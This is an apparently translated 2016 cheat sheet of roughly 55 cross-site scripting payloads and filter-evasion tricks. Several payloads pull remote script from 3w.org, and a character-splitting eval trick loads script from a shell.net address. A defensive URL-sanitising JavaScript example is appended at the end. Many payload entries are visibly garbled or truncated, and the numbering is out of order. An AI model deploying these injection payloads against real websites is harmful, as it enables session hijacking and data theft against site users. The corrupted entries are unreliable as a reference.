XSS Attack Summary

Posted on 2016-4-28 10:06:15
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative pop-up boxes
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag with no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (the semicolon is required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection, an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Working around a character limit (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically ineffective in China, because there is nowhere to use them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters in the IMG tag
<IMG SRC=\'#\'"   javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS to 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS to 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escape-filtered JavaScript
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC=\'#\'" /span>

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE (made up of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
expression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed Flash that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>

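Added here as a defender-side example, not code from the original post: a JavaScript allow-list check for URL-valued attributes (src, href, background, url()) that first undoes the obfuscations the entries above rely on (mixed case, embedded tab/newline/CR, leading spaces, null bytes, numeric entities with or without semicolons), plus the output encoding that turns the tag- and quote-closing entries into inert text. The function and constant names are this example's own, and the sample inputs are constructed.

```javascript
// Undo numeric entities (items 5 and 8-10, with or without the trailing
// semicolon) and the few named ones a payload would use, so that
// "&#106;avascript:" is judged the same way as "javascript:".
function decodeEntities(s) {
  const named = new Map([['amp', '&'], ['lt', '<'], ['gt', '>'], ['quot', '"'], ['apos', "'"], ['tab', '\t'], ['newline', '\n']]);
  return s.replace(/&(#x[0-9a-f]+|#\d+|[a-z]+);?/gi, (m, body) => {
    if (body[0] === '#') {
      const hex = body[1].toLowerCase() === 'x';
      const cp = parseInt(body.slice(hex ? 2 : 1), hex ? 16 : 10);
      return Number.isFinite(cp) && cp <= 0x10ffff ? String.fromCodePoint(cp) : m;
    }
    const v = named.get(body.toLowerCase());
    return v === undefined ? m : v;
  });
}

const ALLOWED_SCHEMES = new Set(['http', 'https', 'mailto']);

// Browsers trim leading/trailing C0 controls and spaces and drop tab/LF/CR anywhere
// in a URL (items 11-15 and 19); legacy engines also tolerated NUL (item 17). Remove
// all of them first, then compare the scheme case-insensitively (item 4) against an
// allow-list, which refuses javascript:, vbscript: (item 40) and data: alike. A URL
// with no scheme (including protocol-relative //host/..., item 25) cannot select a
// script scheme, so it passes; whether that host is trusted is a separate decision.
function isSafeUrl(raw) {
  let s = decodeEntities(String(raw));
  s = s.replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '');
  s = s.replace(/[\t\n\r\u0000]/g, '');
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(s);
  return m === null || ALLOWED_SCHEMES.has(m[1].toLowerCase());
}

// Text and quoted-attribute contexts need output encoding rather than filtering:
// the tag- and quote-closing payloads (items 6, 23, 29, 30) become inert characters.
function encodeForHtml(s) {
  return String(s).replace(/[&<>"'`]/g, c => '&#' + c.charCodeAt(0) + ';');
}

// Constructed samples modelled on the entries above; returns the ones the check refuses.
function auditSamples() {
  const samples = [
    'javascript:alert(1)', 'JaVaScRiPt:alert(1)', 'jav\tascript:alert(1)',
    'jav&#x0A;ascript:alert(1)', '&#106;&#97;&#118;&#97;script:alert(1)',
    '   javascript:alert(1)', 'java\u0000script:alert(1)', 'vbscript:msgbox(1)',
    'https://example.com/a.png', '/images/a.png', '//example.com/a.png',
  ];
  return samples.filter(u => !isSafeUrl(u));
}
```

The check is deliberately stricter than any one browser (it also strips NUL), so it errs toward rejecting a URL rather than accepting one.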